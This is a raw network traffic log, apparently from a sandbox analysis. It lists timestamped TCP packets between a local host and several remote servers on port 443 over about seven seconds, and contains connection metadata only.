Nov 21, 2024 09:53:57.704520941 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704571962 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.704701900 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704730988 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704735994 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.704780102 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704921961 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704932928 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:57.704936981 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.704946995 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:57.934465885 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:57.934607029 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:57.938524008 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:57.938545942 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:57.938779116 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:57.938838959 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:57.946232080 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:57.946260929 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.062999010 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.063126087 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.063698053 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.064023018 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.068136930 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.068146944 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.068365097 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.068372011 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.068432093 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.068558931 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.475771904 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.475825071 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.475847006 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:58.475858927 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.475884914 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:58.475944042 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:58.475951910 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.476008892 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.477418900 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:58.478398085 CET	49790	443	192.168.2.6	20.31.169.57
Nov 21, 2024 09:53:58.478416920 CET	443	49790	20.31.169.57	192.168.2.6
Nov 21, 2024 09:53:58.510870934 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.510974884 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.510992050 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.511058092 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.511100054 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.511156082 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.511156082 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.511161089 CET	443	49791	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:58.511182070 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.511236906 CET	49791	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:58.745110035 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:53:58.745145082 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:53:58.745323896 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:53:58.745721102 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:53:58.745731115 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:53:58.988049030 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:58.988601923 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:58.988636017 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:58.989265919 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:58.989272118 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.103828907 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.104289055 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.104314089 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.104729891 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.104734898 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.175158024 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.175745964 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.175782919 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.176168919 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.176178932 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.432180882 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.432394028 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.432456970 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.432499886 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.432523012 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.432533979 CET	49792	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.432539940 CET	443	49792	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.435252905 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.435383081 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.435480118 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.435609102 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.435630083 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.484857082 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.485234022 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.485306025 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.485707998 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.485723019 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.487186909 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.487473011 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.487505913 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.487835884 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.487864017 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.537858963 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.537950039 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.538100958 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.538129091 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.538141012 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.538151026 CET	49794	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.538156033 CET	443	49794	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.541034937 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.541069031 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.541146994 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.541249990 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.541258097 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.627396107 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.627459049 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.627527952 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.627634048 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.627677917 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.627706051 CET	49793	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.627722025 CET	443	49793	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.629863024 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.629966974 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.630141020 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.630280972 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.630304098 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.929946899 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.930012941 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.930102110 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.931214094 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.931263924 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.931334019 CET	49795	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.931351900 CET	443	49795	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.931391001 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.931463003 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.931526899 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.932387114 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.932437897 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.932473898 CET	49796	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.932490110 CET	443	49796	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.934273958 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.934308052 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.934449911 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.934638023 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.934653044 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.935065985 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.935194969 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:59.935281038 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.935374975 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:59.935411930 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:00.240854025 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.240963936 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.243328094 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.243340969 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.243731976 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.244102001 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.244996071 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.291331053 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.853754997 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.853838921 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.853883982 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.853883982 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.854295015 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.854295015 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.854311943 CET	443	49797	2.23.209.185	192.168.2.6
Nov 21, 2024 09:54:00.854484081 CET	49797	443	192.168.2.6	2.23.209.185
Nov 21, 2024 09:54:00.856152058 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:00.856239080 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:00.856323957 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:00.856616020 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:00.856645107 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:01.287708044 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.317212105 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.317300081 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.317950964 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.317965984 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.320925951 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.321441889 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.321526051 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.322118998 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.322134972 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.408169031 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.414364100 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.414442062 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.418025970 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.418040991 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.715694904 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.716320992 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.716339111 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.716861963 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.716867924 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.720484018 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.720877886 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.720967054 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.721343994 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.721359015 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.742100954 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.742249966 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.742316008 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.742393017 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.742393017 CET	49798	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.742440939 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.742466927 CET	443	49798	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.745181084 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.745259047 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.745340109 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.745471001 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.745490074 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.784508944 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.784588099 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.784656048 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.784853935 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.784899950 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.784926891 CET	49799	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.784945965 CET	443	49799	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.787440062 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.787483931 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.787545919 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.787687063 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.787699938 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.850981951 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.851049900 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.851110935 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.851277113 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.851342916 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.851385117 CET	49800	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.851402998 CET	443	49800	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.854082108 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.854195118 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:01.854279041 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.854413033 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:01.854443073 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.163088083 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.163269043 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.163347960 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.163635969 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.163635969 CET	49802	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.163680077 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.163707018 CET	443	49802	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.166208982 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.166290045 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.166340113 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.167949915 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.168008089 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.168076992 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.168111086 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.168111086 CET	49801	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.168132067 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.168140888 CET	443	49801	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.173377991 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.173393011 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.174770117 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.174793959 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.174879074 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.175000906 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:02.175012112 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:02.498151064 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.498231888 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.498785019 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.498801947 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.499098063 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.499109030 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.961419106 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.961633921 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.961685896 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.961687088 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.961747885 CET	443	49803	150.171.27.10	192.168.2.6
Nov 21, 2024 09:54:02.961772919 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:02.961925030 CET	49803	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:54:03.327805042 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.328840971 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.328841925 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.328917027 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.328942060 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.509392977 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.509912014 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.509946108 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.511399984 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.511405945 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.635304928 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.636245012 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.636311054 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.637290955 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.637304068 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.771734953 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.771811962 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.771998882 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.772524118 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.772578001 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.772613049 CET	49804	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.772628069 CET	443	49804	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.776545048 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.776592016 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.776788950 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.777096987 CET	49809	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.777107954 CET	443	49809	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.942938089 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.943022966 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.943240881 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.948175907 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.948195934 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.948209047 CET	49805	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.948215961 CET	443	49805	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.967593908 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.977854967 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.985559940 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.985572100 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.986200094 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.986205101 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.986937046 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.986946106 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.987426043 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.987431049 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.988711119 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.988740921 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:03.988837957 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.989011049 CET	49810	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:03.989020109 CET	443	49810	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.079612970 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.079685926 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.079792023 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.080290079 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.080290079 CET	49806	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.080363989 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.080396891 CET	443	49806	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.089226007 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.089277983 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.089566946 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.089808941 CET	49811	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.089824915 CET	443	49811	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.415575981 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.415642023 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.415906906 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.415954113 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.415970087 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.415980101 CET	49807	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.415986061 CET	443	49807	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.418932915 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.418953896 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.419027090 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.419212103 CET	49812	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.419223070 CET	443	49812	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.421719074 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.421854019 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.421961069 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.422044039 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.422044039 CET	49808	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.422061920 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.422071934 CET	443	49808	13.107.246.45	192.168.2.6
Nov 21, 2024 09:54:04.424588919 CET	49813	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:54:04.424659967 CET	443	49813	13.107.246.45	192.168.2.6
